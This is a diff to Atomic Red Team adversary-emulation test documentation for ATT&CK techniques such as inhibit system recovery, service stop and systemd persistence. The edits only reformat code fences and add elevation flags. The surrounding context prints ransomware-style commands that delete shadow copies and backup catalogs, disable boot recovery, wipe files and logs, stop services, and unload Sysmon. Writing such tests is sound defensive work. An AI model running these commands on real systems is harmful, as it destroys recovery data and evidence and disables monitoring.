@@ -40,8 +39,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wbadmin.exe delete catalog -quiet ```
@@ -54,8 +52,7 @@ This technique is used by numerous ransomware families and APT malware such as O **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no ``` @@ -74,8 +71,7 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti |------|-------------|------|---------------| | file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sdelete.exe #{file_to_overwrite} ```
@@ -95,8 +91,7 @@ To stop the test, break the command with CTRL/CMD+C. | overwrite_source | Path of data source to overwrite with | Path | /dev/zero| | file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` dd of=#{file_to_overwrite} if=#{overwrite_source} ```
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 3238fd91..6588ced5 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -26,8 +26,7 @@ Stops a specified service using the sc.exe command. |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc.exe stop #{service_name} ```
@@ -44,8 +43,7 @@ Stops a specified service using the net.exe command. |------|-------------|------|---------------| | service_name | Name of a service to stop | String | spooler| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net.exe stop #{service_name} ```
@@ -63,8 +61,7 @@ This technique was used by WannaCry. |------|-------------|------|---------------| | process_name | Name of a process to kill | String | sqlwriter.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` taskkill.exe /f /im #{process_name} ```
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 6bec9449..e9102c22 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -28,8 +28,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` vssadmin.exe delete shadows /all /quiet ```
@@ -41,8 +40,7 @@ Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic.exe shadowcopy delete ```
@@ -54,8 +52,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wbadmin.exe delete catalog -quiet ```
@@ -68,8 +65,7 @@ This technique is used by numerous ransomware families and APT malware such as O **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no ``` diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index 5f2865d3..2aa909c4 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -18,8 +18,7 @@ End the test by using CTRL/CMD+C to break. **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` yes > /dev/null ```
diff --git a/atomics/T1501/T1501.md b/atomics/T1501/T1501.md index 94e49ede..7577b808 100644 --- a/atomics/T1501/T1501.md +++ b/atomics/T1501/T1501.md @@ -39,8 +39,7 @@ This test creates a Systemd service unit file and enables it as a service. | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system| | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file} echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file} echo "" >> #{systemd_service_path}/#{systemd_service_file} @@ -74,8 +73,7 @@ This cleans up the remnants of the SystemD service unit file creation test. | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system| | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` systemctl stop #{systemd_service_file} systemctl disable #{systemd_service_file} rm -rf #{systemd_service_path}/#{systemd_service_file} diff --git a/atomics/index.yaml b/atomics/index.yaml index 5215f879..5f39b7cf 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -5712,6 +5712,7 @@ defense-evasion: default: SysmonDrv executor: name: command_prompt + elevation_required: true command: 'fltmc.exe unload #{sysmon_driver} ' @@ -5740,6 +5741,7 @@ defense-evasion: - windows executor: name: command_prompt + elevation_required: true command: 'sysmon -u '